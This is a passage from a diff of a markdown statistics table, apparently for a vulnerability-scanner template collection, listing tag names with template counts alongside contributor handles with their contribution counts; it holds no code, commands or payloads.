crlf | 10 | arliya | 2 | | | | | | | +| db | 10 | amirhossein raeisi | 2 | | | | | | | +| druid | 9 | joshlarsen | 2 | | | | | | | +| moodle | 9 | paperpen | 2 | | | | | | | +| secret | 9 | raesene | 2 | | | | | | | +| firebase | 9 | dogancanbakir | 2 | | | | | | | +| wso2 | 9 | 6mile | 2 | | | | | | | +| vcenter | 9 | maximus decimus | 2 | | | | | | | +| exchange | 9 | ep1csage | 2 | | | | | | | +| facebook | 9 | shankaracharya | 2 | | | | | | | +| gateway | 9 | 666asd | 2 | | | | | | | +| sangfor | 9 | shelled | 2 | | | | | | | +| elastic | 9 | ree4pwn | 2 | | | | | | | +| scada | 9 | streetofhackerr007 | 2 | | | | | | | +| lucee | 9 | martincodes-de | 2 | | | | | | | +| joomla\! | 9 | 0xrudra | 2 | | | | | | | +| gitea | 9 | korteke | 2 | | | | | | | +| sophos | 9 | 0xsapra | 2 | | | | | | | +| artica | 9 | 8arthur | 2 | | | | | | | +| opencats | 9 | christianpoeschl | 2 | | | | | | | +| pfsense | 9 | kiblyn11 | 2 | | | | | | | +| python | 9 | 0xsmiley | 2 | | | | | | | +| versa | 9 | thardt-praetorian | 2 | | | | | | | +| f5 | 9 | udit_thakkur | 2 | | | | | | | +| cloudtrail | 9 | parzival | 2 | | | | | | | +| cnvd2020 | 9 | bing0o | 2 | | | | | | | +| bitbucket | 9 | ehsahil | 2 | | | | | | | +| console | 9 | gevakun | 2 | | | | | | | +| kube | 9 | bp0lr | 2 | | | | | | | +| oauth | 8 | kre80r | 2 | | | | | | | +| ldap | 8 | koti2 | 2 | | | | | | | +| bucket | 8 | kishore-hariram | 2 | | | | | | | +| cisco-switch | 8 | dbrwsky | 2 | | | | | | | +| default-page | 8 | lstatro | 2 | | | | | | | +| ognl | 8 | k11h-de | 2 | | | | | | | +| lfprojects | 8 | myztique | 2 | | | | | | | +| symantec | 8 | vavkamil | 2 | | | | | | | +| spotweb | 8 | dheerajmadhukar | 2 | | | | | | | +| unauthenticated | 8 | y4er | 2 | | | | | | | +| microfocus | 8 | convisoappsec | 2 | | | | | | | +| nexus | 8 | mzack9999 | 2 | | | | | | | +| mirai | 8 | hackerarpan | 2 | | | | | | | +| phpjabbers | 8 | michal mikolas (nanuqcz) | 2 | | | | | | | +| spotweb_project | 8 | thezakman | 2 | | | | | | | +| discord | 8 | clarkvoss | 2 | | | | | | | +| mlflow | 8 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | +| cloud-enum | 8 | w4cky_ | 2 | | | | | | | +| openemr | 8 | moritz nentwig | 2 | | | | | | | +| phpinfo | 8 | israel comazzetto dos reis | 2 | | | | | | | +| hms | 8 | zomsop82 | 2 | | | | | | | +| odoo | 8 | lotusdll | 2 | | | | | | | +| osint-news | 8 | pxmme1337 | 2 | | | | | | | +| emerge | 8 | paradessia | 2 | | | | | | | +| e-office | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| nagiosxi | 8 | gal nagli | 2 | | | | | | | +| metadata | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| recon | 8 | nuk3s3c | 2 | | | | | | | +| huawei | 8 | g4l1t0 | 2 | | | | | | | +| solarwinds | 8 | dahse89 | 2 | | | | | | | +| cacti | 8 | bananabr | 2 | | | | | | | +| atom | 8 | randomdhiraj | 2 | | | | | | | +| config-audit | 8 | bsysop | 2 | | | | | | | +| manager | 8 | ayadim | 2 | | | | | | | +| go | 8 | v0idc0de | 2 | | | | | | | +| wanhu | 8 | zy9ard3 | 2 | | | | | | | +| teamcity | 7 | redteambrasil | 2 | | | | | | | +| car_rental_management_system_project | 7 | diablo | 1 | | | | | | | +| pmb | 7 | piyushchhiroliya | 1 | | | | | | | +| geoserver | 7 | th3r4id | 1 | | | | | | | +| telesquare | 7 | 2rs3c | 1 | | | | | | | +| maps | 7 | kishore krishna (sillydaddy) | 1 | | | | | | | +| vrealize | 7 | numan türle | 1 | | | | | | | +| nacos | 7 | amnotacat | 1 | | | | | | | +| landray | 7 | ph33rr | 1 | | | | | | | +| linkedin | 7 | caon | 1 | | | | | | | +| gogs | 7 | 0xprial | 1 | | | | | | | +| error | 7 | rivalsec | 1 | | | | | | | +| twitter | 7 | sttlr | 1 | | | | | | | +| nortekcontrol | 7 | bad5ect0r | 1 | | | | | | | +| gradio | 7 | arr0way | 1 | | | | | | | +| pods | 7 | luqman | 1 | | | | | | | +| vpc | 7 | breno_css | 1 | | | | | | | +| bigip | 7 | ratnadip gajbhiye | 1 | | | | | | | +| fortios | 7 | pry0cc | 1 | | | | | | | +| contec | 7 | noah @thesubtlety | 1 | | | | | | | +| ruckus | 7 | colbyjack1134 | 1 | | | | | | | +| websphere | 7 | akokonunes | 1 | | | | | | | +| monstra | 7 | failopen | 1 | | | | | | | +| keking | 7 | viondexd | 1 | | | | | | | +| exploitdb | 7 | d0rkerdevil | 1 | | | | | | | +| moodating | 7 | intx0x80 | 1 | | | | | | | +| rfi | 7 | screamy | 1 | | | | | | | +| avtech | 7 | palanichamy_perumal | 1 | | | | | | | +| shopify | 7 | jonathanwalker | 1 | | | | | | | +| oos | 7 | hakluke | 1 | | | | | | | +| activemq | 7 | alexrydzak | 1 | | | | | | | +| blockchain | 7 | zeroc00i | 1 | | | | | | | +| vms | 7 | technicaljunkie | 1 | | | | | | | +| slack | 7 | tea | 1 | | | | | | | +| bloofox | 7 | elmahdi | 1 | | | | | | | +| opensis | 7 | j3ssie/geraldino2 | 1 | | | | | | | +| splunk | 7 | yhy0 | 1 | | | | | | | +| mobileiron | 7 | co0nan | 1 | | | | | | | +| database | 7 | open-sec | 1 | | | | | | | +| squirrelmail | 7 | fq_hsu | 1 | | | | | | | +| mongodb | 7 | igibanez | 1 | | | | | | | +| filemanager | 7 | kr1shna4garwal | 1 | | | | | | | +| fpd | 7 | staticnoise | 1 | | | | | | | +| beyondtrust | 6 | _harleo | 1 | | | | | | | +| online_fire_reporting_system_project | 6 | p-l- | 1 | | | | | | | +| online-fire-reporting | 6 | toufik-airane | 1 | | | | | | | +| kubelet | 6 | omarjezi | 1 | | | | | | | +| asp | 6 | r3nz0 | 1 | | | | | | | +| rat | 6 | tehtbl | 1 | | | | | | | +| webmin | 6 | andysvints | 1 | | | | | | | +| sql | 6 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| telesquare | 7 | sinsinology | 1 | | | | | | | -| nortekcontrol | 7 | unblvr1 | 1 | | | | | | | -| squirrelmail | 7 | hateshape | 1 | | | | | | | -| exploitdb | 7 | mhdsamx | 1 | | | | | | | -| slack | 7 | piyushchhiroliya | 1 | | | | | | | -| error | 7 | k3rwin | 1 | | | | | | | -| activemq | 7 | httpvoid | 1 | | | | | | | -| twitter | 7 | xcapri | 1 | | | | | | | -| contec | 7 | floriandewald | 1 | | | | | | | -| filemanager | 7 | domenicoveneziano | 1 | | | | | | | -| blockchain | 7 | y0no | 1 | | | | | | | -| car_rental_management_system_project | 7 | ipanda | 1 | | | | | | | -| oos | 7 | jc175 | 1 | | | | | | | -| vms | 7 | 8authur | 1 | | | | | | | -| rfi | 7 | elitebaz | 1 | | | | | | | -| bloofox | 7 | francescocarlucci | 1 | | | | | | | -| fpd | 7 | unp4ck | 1 | | | | | | | -| avtech | 7 | kaizensecurity | 1 | | | | | | | -| monstra | 7 | luqmaan hadia | 1 | | | | | | | -| vpc | 7 | erethon | 1 | | | | | | | -| gogs | 7 | remi gascou (podalirius) | 1 | | | | | | | -| moodating | 7 | 0xprial | 1 | | | | | | | -| keking | 7 | jna1 | 1 | | | | | | | -| pods | 7 | xshuden | 1 | | | | | | | -| shopify | 7 | mys7ic | 1 | | | | | | | -| beyondtrust | 6 | daviey | 1 | | | | | | | -| microstrategy | 6 | notwhy | 1 | | | | | | | -| flutterwave | 6 | mrcl0wnlab | 1 | | | | | | | -| online_fire_reporting_system_project | 6 | bad5ect0r | 1 | | | | | | | -| webmin | 6 | exid | 1 | | | | | | | -| doctor-appointment-system | 6 | youngpope | 1 | | | | | | | -| keycloak | 6 | mubassirpatel | 1 | | | | | | | -| advantech | 6 | f1she3 | 1 | | | | | | | -| bmc | 6 | stupidfish | 1 | | | | | | | -| server | 6 | shiar | 1 | | | | | | | -| jetty | 6 | pdp | 1 | | | | | | | -| asp | 6 | w8ay | 1 | | | | | | | -| typo3 | 6 | nobody | 1 | | | | | | | -| online-fire-reporting | 6 | blckraven | 1 | | | | | | | -| log | 6 | vinit989 | 1 | | | | | | | -| paloaltonetworks | 6 | th3r4id | 1 | | | | | | | -| gcp | 6 | osamahamad | 1 | | | | | | | -| doctor_appointment_system_project | 6 | nielsing | 1 | | | | | | | -| leak | 6 | chetgan | 1 | | | | | | | -| chanjet | 6 | shelld3v | 1 | | | | | | | -| tikiwiki | 6 | tirtha | 1 | | | | | | | -| servicenow | 6 | droberson | 1 | | | | | | | -| sql | 6 | 0xparth | 1 | | | | | | | -| mikrotik | 6 | allenwest24 | 1 | | | | | | | -| minio | 6 | anonymous | 1 | | | | | | | -| plesk | 6 | notsoevilweasel | 1 | | | | | | | -| cockpit | 6 | amir-h-fallahi | 1 | | | | | | | -| synacor | 6 | freakyclown | 1 | | | | | | | -| sonarqube | 6 | chron0x | 1 | | | | | | | -| 74cms | 6 | h4kux | 1 | | | | | | | -| rat | 6 | akshansh | 1 | | | | | | | -| liferay | 6 | 0h1in9e | 1 | | | | | | | -| openvpn | 6 | hczdmr | 1 | | | | | | | -| couchdb | 6 | mariam tariq | 1 | | | | | | | -| jamf | 6 | 0xceba | 1 | | | | | | | -| zhiyuan | 6 | banana69 | 1 | | | | | | | -| magmi | 6 | harryha | 1 | | | | | | | -| cobbler | 6 | nuts7 | 1 | | | | | | | -| asus | 6 | kresec | 1 | | | | | | | -| express | 6 | shreyapohekar | 1 | | | | | | | -| geoserver | 6 | clment cruchet | 1 | | | | | | | -| kubelet | 6 | fmunozs | 1 | | | | | | | -| jeecg | 6 | kishore krishna (sillydaddy) | 1 | | | | | | | -| paypal | 6 | micha3lb3n | 1 | | | | | | | -| splunk | 6 | erikowen | 1 | | | | | | | -| elfinder | 6 | 5up3r541y4n | 1 | | | | | | | -| security | 6 | miroslavsotak | 1 | | | | | | | -| thedigitalcraft | 5 | drewvravick | 1 | | | | | | | -| elementor | 5 | majidmc2 | 1 | | | | | | | -| decision-center | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| blackenergy | 5 | 0xh7ml | 1 | | | | | | | -| avaya | 5 | pascalheidmann | 1 | | | | | | | -| telerik | 5 | kagamigawa | 1 | | | | | | | -| percha | 5 | eremit4 | 1 | | | | | | | -| ems | 5 | tangxiaofeng7 | 1 | | | | | | | -| schneider-electric | 5 | _harleo | 1 | | | | | | | -| crushftp | 5 | mbmy | 1 | | | | | | | -| sysaid | 5 | xc1ym | 1 | | | | | | | -| chamilo | 5 | d0rkerdevil | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | hyunsoo-ds | 1 | | | | | | | -| firmware | 5 | retr0 | 1 | | | | | | | -| spark | 5 | carson chan | 1 | | | | | | | -| caucho | 5 | arall | 1 | | | | | | | -| carrental | 5 | aayush vishnoi | 1 | | | | | | | -| http | 5 | axrk | 1 | | | | | | | -| connectwise | 5 | pry0cc | 1 | | | | | | | -| circarlife | 5 | udyz | 1 | | | | | | | -| tibco | 5 | nerrorsec | 1 | | | | | | | -| nuuo | 5 | matt miller | 1 | | | | | | | -| digitaldruid | 5 | naglis | 1 | | | | | | | -| swagger | 5 | jbaines-r7 | 1 | | | | | | | -| pyload | 5 | mukundbhuva | 1 | | | | | | | -| magmi_project | 5 | opencirt | 1 | | | | | | | -| tenda | 5 | yashanand155 | 1 | | | | | | | -| craftcms | 5 | regala_ | 1 | | | | | | | -| cdata | 5 | r3nz0 | 1 | | | | | | | -| gnu | 5 | imhunterand | 1 | | | | | | | -| matrix | 5 | j33n1k4 | 1 | | | | | | | -| metinfo | 5 | savik | 1 | | | | | | | -| redmine | 5 | luskabol | 1 | | | | | | | -| cnvd2023 | 5 | pudsec | 1 | | | | | | | -| sftp | 5 | manasmbellani | 1 | | | | | | | -| hybris | 5 | dali | 1 | | | | | | | -| axigen | 5 | 0xd0ff9 | 1 | | | | | | | -| gocd | 5 | metascan | 1 | | | | | | | -| webview | 5 | _darrenmartyn | 1 | | | | | | | -| strapi | 5 | omarkurt | 1 | | | | | | | -| acm | 5 | geraldino2 | 1 | | | | | | | -| openstack | 5 | yusakie | 1 | | | | | | | -| sentry | 5 | thebinitghimire | 1 | | | | | | | -| fatpipe | 5 | diablo | 1 | | | | | | | -| cve2007 | 5 | manuelbua | 1 | | | | | | | -| hoteldruid | 5 | sec_hawk | 1 | | | | | | | -| kkfileview | 5 | byobin | 1 | | | | | | | -| adb | 5 | 0xceeb | 1 | | | | | | | -| openai | 5 | ringo | 1 | | | | | | | -| papercut | 5 | akokonunes | 1 | | | | | | | -| akamai | 5 | apt-mirror | 1 | | | | | | | -| storage | 5 | wlayzz | 1 | | | | | | | -| avideo | 5 | jiheon-dev | 1 | | | | | | | -| agentejo | 5 | 0xrod | 1 | | | | | | | -| etcd | 5 | lingtren | 1 | | | | | | | -| parallels | 5 | thelicato | 1 | | | | | | | -| 10web | 5 | nan-kl | 1 | | | | | | | -| mantisbt | 5 | ptonewreckin | 1 | | | | | | | -| glpi-project | 5 | mlec | 1 | | | | | | | -| graylog | 5 | jrolf | 1 | | | | | | | -| dionaea | 5 | knassar702 | 1 | | | | | | | -| rseenet | 5 | zn9988 | 1 | | | | | | | -| checkpoint | 5 | elmahdi | 1 | | | | | | | -| api-server | 5 | kiransau | 1 | | | | | | | -| adminer | 5 | p-l- | 1 | | | | | | | -| openfire | 5 | cbadke | 1 | | | | | | | -| goanywhere | 5 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| wbce | 5 | sshell | 1 | | | | | | | -| webkul | 5 | whotwagner | 1 | | | | | | | -| xmlrpc | 5 | fur1na | 1 | | | | | | | -| jupyter | 5 | chesterblue | 1 | | | | | | | -| cloudflare | 5 | adnanekhan | 1 | | | | | | | -| wpdevart | 5 | zhenwarx | 1 | | | | | | | -| mssql | 5 | deena | 1 | | | | | | | -| qnap | 5 | 0xteles | 1 | | | | | | | -| genetechsolutions | 5 | invisiblethreat | 1 | | | | | | | -| awstats | 5 | mchklt | 1 | | | | | | | -| jabber | 5 | higor melgaço (eremit4) | 1 | | | | | | | -| react | 5 | dabla | 1 | | | | | | | -| web3 | 5 | jonathanwalker | 1 | | | | | | | -| hpe | 5 | iampritam | 1 | | | | | | | -| totolink | 5 | kurohost | 1 | | | | | | | -| password | 5 | sw0rk17 | 1 | | | | | | | -| zzzcms | 5 | juliosmelo | 1 | | | | | | | -| froxlor | 5 | pphuahua | 1 | | | | | | | -| resin | 5 | evan rubinstien | 1 | | | | | | | -| ethereum | 5 | shivanshkhari | 1 | | | | | | | -| circontrol | 5 | marcos_iaf | 1 | | | | | | | -| open-emr | 5 | orpheus | 1 | | | | | | | -| terramaster | 5 | ky9oss | 1 | | | | | | | -| qdpm | 5 | lrtk-coder | 1 | | | | | | | -| jwt | 5 | pepitoh | 1 | | | | | | | -| asana | 5 | apple | 1 | | | | | | | -| apisix | 5 | shifacyclewla | 1 | | | | | | | -| square | 5 | vthiery | 1 | | | | | | | -| voip | 5 | rubina119 | 1 | | | | | | | -| containers | 4 | anon-artist | 1 | | | | | | | -| pixie | 4 | sickwell | 1 | | | | | | | -| mcafee | 4 | queencitycyber | 1 | | | | | | | -| bamboo | 4 | lethargynavigator | 1 | | | | | | | -| ghost | 4 | bughuntersurya | 1 | | | | | | | -| learnpress | 4 | qianbenhyu | 1 | | | | | | | -| os4ed | 4 | michal-mikolas | 1 | | | | | | | -| reprisesoftware | 4 | aaban solutions | 1 | | | | | | | -| sigb | 4 | bartu utku sarp | 1 | | | | | | | -| dotnet | 4 | co0nan | 1 | | | | | | | -| concrete | 4 | kchason | 1 | | | | | | | -| owncloud | 4 | alevsk | 1 | | | | | | | -| mostracms | 4 | puben | 1 | | | | | | | -| linksys | 4 | pjborah | 1 | | | | | | | -| myeventon | 4 | harshinsecurity | 1 | | | | | | | -| d-link | 4 | alex | 1 | | | | | | | -| env | 4 | furkansenan | 1 | | | | | | | -| datadog | 4 | jaskaran | 1 | | | | | | | -| easypost | 4 | caon | 1 | | | | | | | -| codeigniter | 4 | hakluke | 1 | | | | | | | -| intelbras | 4 | davidfegyver | 1 | | | | | | | -| horde | 4 | yashvardhantripathi | 1 | | | | | | | -| httpserver | 4 | west-wise | 1 | | | | | | | -| kevinlab | 4 | ldionmarcil | 1 | | | | | | | -| mailchimp | 4 | josecosta | 1 | | | | | | | -| audiocodes | 4 | amirmsafari | 1 | | | | | | | -| h3c | 4 | therealtoastycat | 1 | | | | | | | -| pega | 4 | amanrawat | 1 | | | | | | | -| puppet | 4 | aringo-bf | 1 | | | | | | | -| gnuboard | 4 | kr1shna4garwal | 1 | | | | | | | -| figma | 4 | screamy | 1 | | | | | | | -| info | 4 | revblock | 1 | | | | | | | -| pie-register | 4 | retr02332 | 1 | | | | | | | -| cnvd2019 | 4 | flag007 | 1 | | | | | | | -| fit2cloud | 4 | af001 | 1 | | | | | | | -| panos | 4 | galoget | 1 | | | | | | | -| kibana | 4 | mantissts | 1 | | | | | | | -| flink | 4 | berkdusunur | 1 | | | | | | | -| hongdian | 4 | remonsec | 1 | | | | | | | -| igniterealtime | 4 | sherlocksecurity | 1 | | | | | | | -| pmb_project | 4 | amnotacat | 1 | | | | | | | -| mostra | 4 | themiddle | 1 | | | | | | | -| wp-statistics | 4 | duty_1g | 1 | | | | | | | -| panabit | 4 | 0xcharan | 1 | | | | | | | -| veronalabs | 4 | kba@sogeti_esec | 1 | | | | | | | -| auieo | 4 | rumble773 | 1 | | | | | | | -| dom | 4 | colbyjack1134 | 1 | | | | | | | -| rabbitmq | 4 | un-fmunozs | 1 | | | | | | | -| tiki | 4 | none | 1 | | | | | | | -| cnvd2022 | 4 | 2rs3c | 1 | | | | | | | -| newstatpress | 4 | rschio | 1 | | | | | | | -| arcgis | 4 | spac3wh1te | 1 | | | | | | | -| metersphere | 4 | igibanez | 1 | | | | | | | -| springcloud | 4 | ndmalc | 1 | | | | | | | -| esri | 4 | w0tx | 1 | | | | | | | -| flatpress | 4 | rinolock | 1 | | | | | | | -| metabase | 4 | gpiechnik2 | 1 | | | | | | | -| aria | 4 | ooooooo_q | 1 | | | | | | | -| codoso | 4 | jas37 | 1 | | | | | | | -| osgeo | 4 | f0xy | 1 | | | | | | | -| metasploit | 4 | kareemse1im | 1 | | | | | | | -| eclipse | 4 | fq_hsu | 1 | | | | | | | -| powerjob | 4 | adilsoybali | 1 | | | | | | | -| nextjs | 4 | miryangjung | 1 | | | | | | | -| angular | 4 | abdullahisik | 1 | | | | | | | -| rocketchat | 4 | technicaljunkie | 1 | | | | | | | -| osint-archived | 4 | godfatherorwa | 1 | | | | | | | -| ternaria | 4 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| confluent | 4 | hel10-web | 1 | | | | | | | -| juniper | 4 | carlosvieira | 1 | | | | | | | -| yeswiki | 4 | compr00t | 1 | | | | | | | -| articatech | 4 | juicypotato1 | 1 | | | | | | | -| candidats | 4 | 0ut0fb4nd | 1 | | | | | | | -| grav | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| prtg | 4 | push4d | 1 | | | | | | | -| jellyfin | 4 | jfbes | 1 | | | | | | | -| terra-master | 4 | 0xtavian | 1 | | | | | | | -| age-encryption | 4 | stux | 1 | | | | | | | -| proftpd | 4 | am0nt31r0 | 1 | | | | | | | -| rubyonrails | 4 | ramondunker | 1 | | | | | | | -| sendgrid | 4 | mayank_pandey01 | 1 | | | | | | | -| roxy | 4 | millermedia | 1 | | | | | | | -| newstatpress_project | 4 | myst7ic | 1 | | | | | | | -| shiro | 4 | borna nematzadeh | 1 | | | | | | | -| postmessage | 4 | justmumu | 1 | | | | | | | -| httpd | 4 | m0ck3d | 1 | | | | | | | -| consul | 4 | furkansayim | 1 | | | | | | | -| hongfan | 4 | danigoland | 1 | | | | | | | -| flickr | 4 | narluin | 1 | | | | | | | -| djangoproject | 4 | fpatrik | 1 | | | | | | | -| eyoucms | 4 | ledoubletake | 1 | | | | | | | -| cve2005 | 4 | abbas.heybati | 1 | | | | | | | -| ebs | 4 | ofjaaah | 1 | | | | | | | -| joomlamo | 4 | aron molnar | 1 | | | | | | | -| creativeitem | 4 | petruknisme | 1 | | | | | | | -| seagate | 4 | mammad_rahimzada | 1 | | | | | | | -| jsf | 4 | schniggie | 1 | | | | | | | -| dahuasecurity | 4 | sicksec | 1 | | | | | | | -| kentico | 4 | skylark-lab | 1 | | | | | | | -| kyocera | 4 | yavolo | 1 | | | | | | | -| zend | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| kingsoft | 4 | jeya.seelan | 1 | | | | | | | -| mitel | 4 | paper-pen | 1 | | | | | | | -| webshell | 4 | rotembar | 1 | | | | | | | -| supsystic | 4 | dk999 | 1 | | | | | | | -| artifactory | 4 | arr0way | 1 | | | | | | | -| nosqli | 4 | tehtbl | 1 | | | | | | | -| phppgadmin | 4 | bugvsme | 1 | | | | | | | -| ray | 4 | jbertman | 1 | | | | | | | -| churchcrm | 4 | open-sec | 1 | | | | | | | -| mooveagency | 4 | yiran | 1 | | | | | | | -| ransomware | 4 | ilovebinbash | 1 | | | | | | | -| aura | 4 | rotemreiss | 1 | | | | | | | -| globalprotect | 4 | pratik khalane | 1 | | | | | | | -| jorani | 4 | shockwave | 1 | | | | | | | -| pentaho | 4 | d4ly | 1 | | | | | | | -| pluginus | 4 | dale clarke | 1 | | | | | | | -| hospital_management_system_project | 4 | exploitation | 1 | | | | | | | -| harbor | 4 | ling | 1 | | | | | | | -| stripe | 4 | couskito | 1 | | | | | | | -| imgproxy | 4 | vzamanillo | 1 | | | | | | | -| wireguard | 4 | jacalynli | 1 | | | | | | | -| bitrix | 4 | phyr3wall | 1 | | | | | | | -| dolibarr | 4 | jub0bs | 1 | | | | | | | -| ampache | 4 | miguelsegoviagil | 1 | | | | | | | -| webmail | 4 | olewagner | 1 | | | | | | | -| thimpress | 4 | irshadahamed | 1 | | | | | | | -| linkerd | 4 | realexp3rt | 1 | | | | | | | -| royalevent | 4 | undefl0w | 1 | | | | | | | -| umbraco | 4 | shiva (strobes security) | 1 | | | | | | | -| okta | 4 | petergrifin | 1 | | | | | | | -| wcs | 4 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| phpjabber | 4 | philippdelteil | 1 | | | | | | | -| moveit | 4 | iphantasmic | 1 | | | | | | | -| salesforce | 4 | shivampand3y | 1 | | | | | | | -| opencms | 4 | mah3sec_ | 1 | | | | | | | -| search | 4 | viniciuspereiras | 1 | | | | | | | -| aspose | 4 | defektive | 1 | | | | | | | -| telegram | 4 | tea | 1 | | | | | | | -| finicity | 4 | mass0ma | 1 | | | | | | | -| heroku | 4 | aaronchen0 | 1 | | | | | | | -| linuxfoundation | 4 | ahmed abou-ela | 1 | | | | | | | -| sugarcrm | 4 | ynnirc | 1 | | | | | | | -| pip | 4 | oscarintherocks | 1 | | | | | | | -| zte | 4 | r3s ost | 1 | | | | | | | -| centos | 4 | liquidsec | 1 | | | | | | | -| mautic | 4 | n0el4kls | 1 | | | | | | | -| jfrog | 4 | zinminphy0 | 1 | | | | | | | -| thinkcmf | 4 | secthebit | 1 | | | | | | | -| bittrex | 4 | lixts | 1 | | | | | | | -| photo | 4 | null_hypothesis | 1 | | | | | | | -| sound4 | 4 | hazana | 1 | | | | | | | -| casaos | 4 | hüseyin tintaş | 1 | | | | | | | -| harmistechnology | 4 | danfaizer | 1 | | | | | | | -| httpbin | 3 | christbowel | 1 | | | | | | | -| segment | 3 | hlop | 1 | | | | | | | -| r-seenet | 3 | patralos | 1 | | | | | | | -| grp | 3 | dorkerdevil | 1 | | | | | | | -| modoboa | 3 | palanichamy_perumal | 1 | | | | | | | -| siemens | 3 | brianlam38 | 1 | | | | | | | -| webcam | 3 | phillipo | 1 | | | | | | | -| structurizr | 3 | h4sh5 | 1 | | | | | | | -| empirecms | 3 | dievus | 1 | | | | | | | -| key | 3 | soyelmago | 1 | | | | | | | -| thinfinity | 3 | zeyad azima | 1 | | | | | | | -| sidekiq | 3 | udinchan | 1 | | | | | | | -| xxljob | 3 | xeldax | 1 | | | | | | | -| lansweeper | 3 | ap3r | 1 | | | | | | | -| fileman | 3 | calumjelrick | 1 | | | | | | | -| adiscon | 3 | guax1 | 1 | | | | | | | -| ithemes | 3 | staticnoise | 1 | | | | | | | -| strangerstudios | 3 | affix | 1 | | | | | | | -| passcv | 3 | makyotox | 1 | | | | | | | -| ad | 3 | noobexploiter | 1 | | | | | | | -| gradle | 3 | yaser_s | 1 | | | | | | | -| axis | 3 | barthy.koeln | 1 | | | | | | | -| projectsend | 3 | ahmetpergamum | 1 | | | | | | | -| xerox | 3 | joaonevess | 1 | | | | | | | -| switch | 3 | bjxsec | 1 | | | | | | | -| ampps | 3 | tirtha_mandal | 1 | | | | | | | -| octobercms | 3 | nytr0gen | 1 | | | | | | | -| sharefile | 3 | kiks7 | 1 | | | | | | | -| pulsar | 3 | toufik-airane | 1 | | | | | | | -| chatgpt | 3 | jeya seelan | 1 | | | | | | | -| academylms | 3 | andysvints | 1 | | | | | | | -| mailgun | 3 | tim_koopmans | 1 | | | | | | | -| monitorr | 3 | b4uh0lz | 1 | | | | | | | -| boldgrid | 3 | bibeksapkota (sar00n) | 1 | | | | | | | -| processwire | 3 | dwbzn | 1 | | | | | | | -| payara | 3 | napgh0st | 1 | | | | | | | -| softwarepublico | 3 | watchtowr | 1 | | | | | | | -| cgi | 3 | intx0x80 | 1 | | | | | | | -| sns | 3 | dhiyanesdk | 1 | | | | | | | -| selea | 3 | carrot2 | 1 | | | | | | | -| newsletter | 3 | lbb | 1 | | | | | | | -| voipmonitor | 3 | izn0u | 1 | | | | | | | -| copyparty | 3 | alperenkesk | 1 | | | | | | | -| dos | 3 | wpsec | 1 | | | | | | | -| webtareas | 3 | arqsz | 1 | | | | | | | -| sharepoint | 3 | failopen | 1 | | | | | | | -| learndash | 3 | absshax | 1 | | | | | | | -| circleci | 3 | jcockhren | 1 | | | | | | | -| dotnetnuke | 3 | mesaglio | 1 | | | | | | | -| gvectors | 3 | archer | 1 | | | | | | | -| loytec | 3 | sttlr | 1 | | | | | | | -| mapbox | 3 | esonhugh | 1 | | | | | | | -| synology | 3 | rivalsec | 1 | | | | | | | -| messaging | 3 | momen eldawakhly | 1 | | | | | | | -| yzmcms | 3 | sorrowx3 | 1 | | | | | | | -| truenas | 3 | booboohq | 1 | | | | | | | -| tableau | 3 | b0yd | 1 | | | | | | | -| dev.pucit.edu.pk | 3 | pwnwithlove | 1 | | | | | | | -| telnet | 3 | elder tao | 1 | | | | | | | -| netflix | 3 | b0rn2r00t | 1 | | | | | | | -| esafenet | 3 | unkl4b | 1 | | | | | | | -| webtareas_project | 3 | djoevanka | 1 | | | | | | | -| idrac | 3 | high | 1 | | | | | | | -| hsphere | 3 | ph33rr | 1 | | | | | | | -| inspur | 3 | vikas kundu | 1 | | | | | | | -| forum | 3 | patrick pirker | 1 | | | | | | | -| wwbn | 3 | fopina | 1 | | | | | | | -| wpdeveloper | 3 | elouhi | 1 | | | | | | | -| joomlacomponent.inetlanka | 3 | ratnadip gajbhiye | 1 | | | | | | | -| rubygems | 3 | unknown | 1 | | | | | | | -| soplanning | 3 | whynotke | 1 | | | | | | | -| ansible | 3 | lamscun | 1 | | | | | | | -| phpipam | 3 | win3zz | 1 | | | | | | | -| finecms | 3 | ayadi | 1 | | | | | | | -| dzzoffice | 3 | pussycat0 | 1 | | | | | | | -| apple | 3 | breno_css | 1 | | | | | | | -| monitor | 3 | yuansec | 1 | | | | | | | -| drawio | 3 | adamparsons | 1 | | | | | | | -| spotify | 3 | zsusac | 1 | | | | | | | -| avada | 3 | adrianmf | 1 | | | | | | | -| watchguard | 3 | aceseven (digisec360) | 1 | | | | | | | -| thefactory | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | +| jamf | 6 | defektive | 1 | | | | | | | +| cockpit | 6 | jbertman | 1 | | | | | | | +| gcp | 6 | michael wedl | 1 | | | | | | | +| cobbler | 6 | amirmsafari | 1 | | | | | | | +| paloaltonetworks | 6 | spac3wh1te | 1 | | | | | | | +| elfinder | 6 | jeya.seelan | 1 | | | | | | | +| doctor_appointment_system_project | 6 | cbadke | 1 | | | | | | | +| express | 6 | luciannitescu | 1 | | | | | | | +| log | 6 | zn9988 | 1 | | | | | | | +| sonarqube | 6 | whotwagner | 1 | | | | | | | +| couchdb | 6 | sospiro | 1 | | | | | | | +| doctor-appointment-system | 6 | ky9oss | 1 | | | | | | | +| 74cms | 6 | hanlaomo | 1 | | | | | | | +| leak | 6 | makyotox | 1 | | | | | | | +| chanjet | 6 | prettyboyaaditya | 1 | | | | | | | +| security | 6 | jadu101 | 1 | | | | | | | +| liferay | 6 | chesterblue | 1 | | | | | | | +| jetty | 6 | pudsec | 1 | | | | | | | +| asus | 6 | phyr3wall | 1 | | | | | | | +| servicenow | 6 | byobin | 1 | | | | | | | +| minio | 6 | liquidsec | 1 | | | | | | | +| jeecg | 6 | invisiblethreat | 1 | | | | | | | +| microstrategy | 6 | anonymous | 1 | | | | | | | +| paypal | 6 | arall | 1 | | | | | | | +| advantech | 6 | alevsk | 1 | | | | | | | +| keycloak | 6 | pussycat0 | 1 | | | | | | | +| flutterwave | 6 | schniggie | 1 | | | | | | | +| cnvd2023 | 6 | yavolo | 1 | | | | | | | +| tikiwiki 